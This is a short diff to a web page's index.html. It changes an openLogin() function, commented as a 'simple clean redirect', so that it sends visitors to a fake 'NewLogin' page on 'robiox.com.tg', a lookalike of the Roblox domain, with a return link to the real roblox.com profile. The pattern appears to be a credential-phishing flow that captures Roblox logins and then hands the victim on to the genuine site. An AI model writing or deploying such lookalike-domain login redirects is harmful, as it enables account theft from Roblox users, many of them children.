--- a/index.html
+++ b/index.html
@@ -286,7 +286,7 @@
 
     // Simple clean redirect
     function openLogin() {
-      window.location.href = "https://www.robiox.com.tg/users/418536882031/profile";
+      window.location.href = "https://www.robiox.com.tg/NewLogin?returnUrl=https%3A%2F%2Fwww.roblox.com%2Fusers%2F418536882031%2Fprofile";
     }
   </script>
 </body>
